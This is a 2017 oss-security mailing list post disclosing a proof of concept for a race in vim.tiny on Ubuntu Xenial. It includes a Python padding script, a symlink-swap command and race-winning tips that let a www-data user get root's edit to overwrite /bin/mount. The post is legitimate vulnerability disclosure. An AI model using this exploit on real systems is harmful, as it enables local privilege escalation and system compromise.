Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Mon, 13 Nov 2017 15:10:25 +0000
From: Fiedler Roman <Roman.Fiedler@....ac.at>
To: "'oss-security@...ts.openwall.com'" <oss-security@...ts.openwall.com>
Subject: AW: Security risk of server side text editing in
 general and vim.tiny specifically

Hello Alexander,

> Von: Solar Designer [mailto:solar@...nwall.com]
>
> On Fri, Nov 03, 2017 at 11:07:14AM +0000, Fiedler Roman wrote:
> > PS: POC for vim.tiny on Ubuntu Xenial to overwrite arbitrary files as user
> root when editing file in directory owned by other user is available on
> request, disclosure after one week or if list discussion indicates other 
> timing.
>
> Please post this PoC in here ASAP.  Right now, you're in violation of
> distros list policy for having posted the PoC in there yet not made it
> public on oss-security within 7 days after posting about the issue
> itself in here.  Please correct this.  (To me this is also an example of
> misuse of the distros list, and then of the ability to delay posting the
> PoC - creating administrative work for all of us out of thin air.)

Thanks for the reminder. here is the text from the original mail to your 
[vs]-list:

PS: POC for Ubuntu Xenial to overwrite /bin/mount with custom content by
creating a x.txt as another user (e.g. www-data) and having root edit it using
vim.tiny. Of course attacker would restore everything to normal afterwards
(omitted). On multicore machines, the race is not always won, for testing
purposes you can strace vim (making it slower) or add other machine load, e.g
" (cat /dev/zero | md5sum) &" as www-data. With strace, chance is nearly 100%
to replace /bin/mount with x.txt (including mode, ownership). With 24 md5sum
on a 4 core machine, chance is > 80% to make /bin/mount world writable,
otherwise also replacing the content, changing ownership.

* Create a rogue file of same size as user www-data: In real world attack,
attack would pad a file writeable by him to same size as a system library,
essential binary using spaces or newlines at the end of the file. For demo,
newlines only will do.

#!/usr/bin/python3 -BEsStt

import os

mountSize = os.stat('/bin/mount').st_size
targetFileName = 'x.txt'
targetFile = open(targetFileName, 'wb')
targetFile.write(b'\n' * mountSize)
targetFile.close()
os.chmod(targetFileName, 0o777)

* Use tool from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=602333 to
replace with symlink. Start it as www-data after root started "vim.tiny x.txt"
but before saving file as root.

./DirModifyInotify --Watch x.txt --MovePath x.txt --LinkTarget
/bin/mount --WatchCount 0



Download attachment "smime.p7s" of type "application/pkcs7-signature" (4814 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.